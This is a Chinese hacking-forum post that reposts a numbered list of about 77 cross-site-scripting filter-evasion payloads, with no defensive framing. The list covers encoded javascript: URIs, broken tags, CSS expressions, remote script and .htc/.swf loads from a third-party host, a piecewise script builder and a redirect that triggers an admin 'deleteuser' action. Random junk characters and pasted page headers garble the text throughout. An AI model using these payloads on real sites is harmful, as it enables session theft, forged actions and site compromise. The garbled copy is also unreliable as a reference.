貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
* h3 b9 j8 }- v/ b( D% A1 h) c9 n(1)普通的XSS JavaScript注入
8 p$ \$ P, v- a5 Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, T' h# m( r- B3 Q U
(2)IMG标签XSS使用JavaScript命令6 S" U# l* o) I0 J" H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" U3 a3 R) h5 y$ f1 ^6 m ^ g(3)IMG标签无分号无引号" `$ q& W2 w8 e( N' z+ @ E, d. n' F
<IMG SRC=javascript:alert(‘XSS’)>4 U, v' V7 G: |* k
(4)IMG标签大小写不敏感% \- T, \' t& k
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 O/ ^, X7 ~6 \/ s+ r) F2 \) \; P(5)HTML编码(必须有分号)
" C3 U% y& y* |0 m/ u<IMG SRC=javascript:alert(“XSS”)>
+ P0 M2 M8 \6 L9 h" j- n* M1 K(6)修正缺陷IMG标签* r( \) r! X5 V4 ?
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ `. U) U+ l4 Q; k; c. ~; G% f6 T" X2 F) X5 _7 T9 t
9 w5 W |* _9 e- E(7)formCharCode标签(计算器)
/ |+ N# m8 K l# T' J<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 C$ r6 X) X: Q. a(8)UTF-8的Unicode编码(计算器)" F% r0 M7 d# W
<IMG SRC=jav..省略..S')>/ t$ S' f! E6 K r& H8 q# C9 q' O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)) m7 I. X% @6 t- K
<IMG SRC=jav..省略..S')>
8 N, X; W0 }; ~! E0 x# ~(10)十六进制编码也是没有分号(计算器)
+ f: d* ]$ `' d2 f1 Y9 c' s( b<IMG SRC=java..省略..XSS')>
9 R) x2 G5 p1 T& j% h- m0 a/ P(11)嵌入式标签,将Javascript分开
( l, B+ J6 C" Q# }<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 D. E' y" j4 i8 j) Z" [) {; k(12)嵌入式编码标签,将Javascript分开# O( q. n0 c$ U4 `
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 Q2 C" p; y" P7 b3 h, d: o
(13)嵌入式换行符4 g. A: Q% Y) Y% Z6 @9 f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ _% e$ p! k* ^: e# Y; O* }, a(14)嵌入式回车! x& i9 {. o: @2 G3 V: X( o: \
<IMG SRC=”jav ascript:alert(‘XSS’);”># L1 A3 [( A1 M0 \% t
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; A4 M, O1 ]+ {1 K* h& e
<IMG SRC=”javascript:alert(‘XSS‘)”>! s( w7 C" b# l* i% Z/ T9 O/ }, h
(16)解决限制字符(要求同页面)3 M% w* k v. O& D1 c! ~
<script>z=’document.’</script>
3 u& X% H( B3 _9 k3 [<script>z=z+’write(“‘</script>+ ^: u9 E! H$ x& M5 d
<script>z=z+’<script’</script>
6 m) m7 _; j; H<script>z=z+’ src=ht’</script>
+ D" ]1 v x0 u5 V; N( V<script>z=z+’tp://ww’</script>
) [4 m) D4 f4 p" T' V% R; I<script>z=z+’w.shell’</script>
3 q+ C* l* ~! y- R O" D; {<script>z=z+’.net/1.’</script>
, x& ]+ g* y h* J<script>z=z+’js></sc’</script>- t }- L* ^) G6 G6 ~
<script>z=z+’ript>”)’</script>' D" s4 K5 T/ F! L$ R& w7 }
<script>eval_r(z)</script>
& M3 J% ?9 x' x& b3 i1 F" X8 G4 c(17)空字符12-7-1 T00LS - Powered by Discuz! Board0 u, R9 \' ?+ {/ @" K
https://www.t00ls.net/viewthread ... table&tid=15267 2/6: q; j% O/ w$ d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 w7 j# Z# Q7 H" J9 n! C
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ b- N$ y" D' C$ bperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 M5 i% G; d) p: M c1 `4 D
(19)Spaces和meta前的IMG标签
, U. g, N1 R+ V2 I5 z<IMG SRC=” javascript:alert(‘XSS’);”>
$ q5 s. M3 p0 N' v1 K- _9 A(20)Non-alpha-non-digit XSS
9 ~: u. U% [" V! q<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># {$ m& N S: S, y, v: w
(21)Non-alpha-non-digit XSS to 2
, G/ F- c& }6 M: z6 i% f<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># O3 n' H( d& e, g
(22)Non-alpha-non-digit XSS to 3
" B5 d: [0 _' i2 {: _3 L<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 x. L5 C+ ]8 v$ h; `# a! J" T
(23)双开括号! Q2 R6 o; N4 i* l- s2 O% z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>; `7 T) Z+ C# `. u6 @
(24)无结束脚本标记(仅火狐等浏览器)
2 a# t! e( ^2 e2 p+ V<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! Y% Q- d4 I" _
(25)无结束脚本标记25 P1 |; E: v5 v
<SCRIPT SRC=//3w.org/XSS/xss.js>
; S5 y1 i! n) I5 p0 Y(26)半开的HTML/JavaScript XSS- W @8 y8 d: W# ?
<IMG SRC=”javascript:alert(‘XSS’)”
) T9 @: S0 U- M, @(27)双开角括号" o0 k5 L+ x& s/ ?( K( }7 G1 a
<iframe src=http://3w.org/XSS.html <
+ n1 c; K" j: v(28)无单引号 双引号 分号
, K" T$ |5 Z& {5 c$ s6 Z<SCRIPT>a=/XSS/" D9 C' ^& r# s/ T" ^
alert(a.source)</SCRIPT>
' y7 e1 B7 G' w(29)换码过滤的JavaScript
, T% D7 s) f A/ _! ?/ V! G\”;alert(‘XSS’);//
7 k. z( I1 d, C(30)结束Title标签! B! {& f3 B+ k
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: h( V2 Z6 W o- `: u& ]# n) T
(31)Input Image; t7 P4 d9 w5 d1 f; ?, r" @$ G
<INPUT SRC=”javascript:alert(‘XSS’);”>
$ {( A s7 Q3 _% a" D ?9 ~( x(32)BODY Image2 ]5 F& B* m( T# V8 X* h" h: ~
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 ]4 {) c0 k' B6 }; s) |$ D(33)BODY标签
9 l$ A8 q, f( n" x) ?: E<BODY(‘XSS’)>: A6 _$ r$ c9 l; r( l9 |6 N$ E! ]6 f
(34)IMG Dynsrc8 r2 ^8 I- D# C( e' B
<IMG DYNSRC=”javascript:alert(‘XSS’)”>9 \2 A* j7 F' `1 A4 \! c' m, Z
(35)IMG Lowsrc) R1 u0 r8 b6 L, c: T
<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 v3 l$ [: H( ?+ R( E2 Q0 K
(36)BGSOUND0 s2 s4 u3 o$ ^& }
<BGSOUND SRC=”javascript:alert(‘XSS’);”>3 a$ c$ C" s* O+ G
(37)STYLE sheet- w! R: k, z' o/ d$ h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”># H3 k2 x7 \. O( G$ ~4 D6 v
(38)远程样式表, h) m/ p4 ?8 S" R3 @7 C2 T
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
c" F1 b3 @6 n) V1 U8 v(39)List-style-image(列表式)
' m5 R H$ F6 n* t' o. p! V& {7 F<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 x7 _: G* @0 A2 B* B
(40)IMG VBscript
# V2 g. Q( R1 ^2 X1 X<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% p U- `, Z8 W7 E1 \
(41)META链接url: L4 E& \( Y6 E
. ^3 q3 p4 P+ k4 [0 p
% k& ^% g9 \; f<META HTTP-EQUIV=”refresh” CONTENT=”0;. s% a8 J+ g' M7 Q( R. n1 N3 k
URL=http://;URL=javascript:alert(‘XSS’);”>
9 L2 v* Q& u0 R9 b; C(42)Iframe
0 C+ T3 f* O( ^0 F! K3 z$ J/ P. ]<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- c9 \+ r) ^7 o/ q. _(43)Frame
; S# g1 S3 H" ^) o4 R/ n<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board$ ~: H6 ]- P3 \1 C5 J; l+ _
https://www.t00ls.net/viewthread ... table&tid=15267 3/6( ?4 Y: j& u' O; E8 e( d
(44)Table1 \) v9 q0 y4 u
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 C/ S" C/ ~5 l+ Z- B3 S(45)TD6 h0 \' c4 R3 s1 {$ R: D
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ Y5 S }& ^* J
(46)DIV background-image& {# Z/ Y; f6 f
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 ~1 Y* N4 T, q Z( K% h
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-+ B7 R f# [ E( O5 n
8&13&12288&65279)4 A0 T H3 n( I" ~# m+ d
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ \8 j; c I E& c9 N, v$ d(48)DIV expression, U7 W& h" g! ~' a
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ q) e) I, `* G4 j(49)STYLE属性分拆表达
+ g& G" j, j# _% ]# u<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ S$ S- k& O8 q& R. r$ F2 ?(50)匿名STYLE(组成:开角号和一个字母开头): p& O2 W* J( e
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" B3 D" Y2 |& U+ v" E" h
(51)STYLE background-image
2 P3 ^# K. [7 a4 `<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A( f( _7 A+ z `4 o
CLASS=XSS></A>7 V" v S5 o/ S/ X! E
(52)IMG STYLE方式; u* H4 W, }; j! C
exppression(alert(“XSS”))’>
; a: y/ Q$ E. H. o(53)STYLE background
* v/ X/ [2 K3 ]' T" K+ I) Q6 Q( g& c<STYLE><STYLE+ |- G& J1 K; H6 B
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 \* s2 p# Z, k) `, ^
(54)BASE* n1 ]/ E$ O& z1 l
<BASE HREF=”javascript:alert(‘XSS’);//”>
* ~# d5 `( ` T4 j* b: J(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# O: {7 q) ^3 [6 J& R+ ?<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( E$ [, {. O ^1 t" _! `# v* k8 {(56)在flash中使用ActionScrpt可以混进你XSS的代码
# x1 a. ]* t" K7 m. o& ca=”get”;
+ }+ q1 ]) a5 H e5 `b=”URL(\”";5 Q9 `# N2 d, ^, K$ c( p. c
c=”javascript:”;
8 Z2 f3 j9 z# E; ]* Sd=”alert(‘XSS’);\”)”;7 T4 X w5 t4 K" V! r
eval_r(a+b+c+d);4 B3 z S4 H3 @9 ^) D
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上% w# p/ f% f+ L1 o, X8 O, j/ y F
<HTML xmlns:xss>
5 O* I Q# Q' P! g/ H* P% }$ @/ L<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, w+ @( e* f# i I
<xss:xss>XSS</xss:xss>2 X* c6 y+ s# q: d8 [& {
</HTML>
" I) n2 b w: v1 M5 y(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. A; W$ n1 G \+ ?<SCRIPT SRC=””></SCRIPT>6 _! m3 B( Y4 | b3 X, j
(59)IMG嵌入式命令,可执行任意命令$ `& w! r4 R# ?3 E( A
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# f; Z& G3 y: m(60)IMG嵌入式命令(a.jpg在同服务器) Q4 J8 Q4 U, ?- W1 I
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- Y8 R& f) P. u. J' c& n
(61)绕符号过滤
$ m5 X: {4 k" N* T4 _<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>+ I5 m2 h' @ i5 N
(62)
0 t) e! D1 U- ?% \<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 h2 U8 e% S& {/ z
(63)
8 l+ n3 \( a6 E/ W5 {1 J$ F<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>8 | |9 u* ^- R T8 a. L; n% n% y
(64)8 W/ C' ]% T s+ N
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 i; G# y9 ?5 p* y J
(65)
/ p. q0 Q6 P9 k' }) i" z; y<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
" g, s$ J( u0 \3 s5 Y(66)12-7-1 T00LS - Powered by Discuz! Board
' g% ^0 n7 H# s4 V4 thttps://www.t00ls.net/viewthread ... table&tid=15267 4/68 I+ d3 x6 w, W! d- G0 V) c
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' v3 N9 j" i& S, a1 f' U: z
(67)
: Y( c+ q i. Z6 h* e<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>9 T# P" H3 V1 I
</SCRIPT>' A3 ?) h `, |. }; O! R4 _
(68)URL绕行7 j: H! K- e2 T
<A HREF=”http://127.0.0.1/”>XSS</A>
" u+ y0 X- |7 J& d6 D7 n, l( Z0 w(69)URL编码
- y, |) a! r o9 J7 A<A HREF=”http://3w.org”>XSS</A> h6 s9 c1 o5 E S. y* t& K. T; @
(70)IP十进制
* O7 ^4 n7 o1 a! `7 x<A HREF=”http://3232235521″>XSS</A>
4 a6 o/ r3 k, K+ H$ F6 U+ ~2 F% u( h(71)IP十六进制( g+ E9 z1 e& \; _3 p3 e. D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* P' d J2 N1 p7 X! {% E(72)IP八进制2 h. e# d3 T# q% B; Z7 H0 j
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* h6 L/ O0 L" \, O# |) M) ^& ?
(73)混合编码& D, Q, `8 p0 u0 a
<A HREF=”h
E R! h% B9 K0 j. E, Stt p://6 6.000146.0×7.147/”">XSS</A>3 B% `1 g. e! o# H1 j/ ?6 ^
(74)节省[http:]& E. V% ^6 m1 ]& C
<A HREF=”//www.google.com/”>XSS</A># I, A! k4 g! c/ A
(75)节省[www]
; `' w q3 l" C0 [<A HREF=”http://google.com/”>XSS</A>7 z, ?) k! M9 }/ z- C7 x, ~* i
(76)绝对点绝对DNS/ c4 T. V- Q7 {$ q7 P! `+ s: `
<A HREF=”http://www.google.com./”>XSS</A>0 n. V3 l1 S( `& @9 V" c
(77)javascript链接
0 N0 g6 t6 t. v4 L<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
% k( G7 h' b/ X# j
7 S' J$ \/ p( Y) J9 s: Z0 x* g原文地址:http://fuzzexp.org/u/0day/?p=14
0 W2 D+ Z. n' F- Q/ X1 m* S; r2 s- J! E+ N3 y5 j
|
发表于 2013-4-19 19:22:37
收藏
支持
反对